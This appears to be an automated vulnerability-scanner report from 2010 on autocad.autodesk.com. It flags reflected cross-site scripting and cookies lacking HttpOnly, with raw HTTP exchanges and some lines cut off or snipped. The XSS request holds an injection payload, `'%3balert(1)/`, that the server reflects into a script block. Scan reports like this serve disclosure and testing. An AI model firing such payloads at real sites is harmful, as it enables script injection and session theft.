1. Cross-site scripting (reflected)
2. Cookie without HttpOnly flag set
Severity: High
Confidence: Certain
Host: http://autocad.autodesk
Path: /

GET /?62ebe'%3balert(1)/
Host: autocad.autodesk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

HTTP/1.1 200 OK
connection: close
content-type: text/html; charset=UTF-8
date: Fri, 12 Nov 2010 04:14:55 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: Apache/2.2.3 (Red Hat)
vary: Accept-Encoding
Set-Cookie: uuid=12716910351316; Path=/; Expires=Fri, 11 Nov 2011 20:14:55 UTC
Set-Cookie: day=1; Path=/
Set-Cookie: agent=local; Path=/; Expires=Sun, 26 Dec 2010 20:14:55 UTC
Set-Cookie: LB-INFO=1669538570.20480
Set-Cookie: LB-INFO-WS=1229005578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR
<html xmlns="http://www.w3.org
<head>
<meta http-equiv="C
...[SNIP]...
<script>
if( document.location
document.location.replace
}
</script>
...[SNIP]...

Severity: Information
Confidence: Certain
Host: http://autocad.autodesk
Path: /

GET / HTTP/1.1
Host: autocad.autodesk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

HTTP/1.1 200 OK
connection: close
content-type: text/html; charset=UTF-8
date: Fri, 12 Nov 2010 04:14:49 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: Apache/2.2.3 (Red Hat)
vary: Accept-Encoding
Set-Cookie: uuid=12716910351316; Path=/; Expires=Fri, 11 Nov 2011 20:14:49 UTC
Set-Cookie: day=1; Path=/
Set-Cookie: agent=local; Path=/; Expires=Sun, 26 Dec 2010 20:14:49 UTC
Set-Cookie: LB-INFO=1686315786.20480
Set-Cookie: LB-INFO-WS=1195451146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR
<html xmlns="http://www.w3.org
<head>
<meta http-equiv="C
...[SNIP]...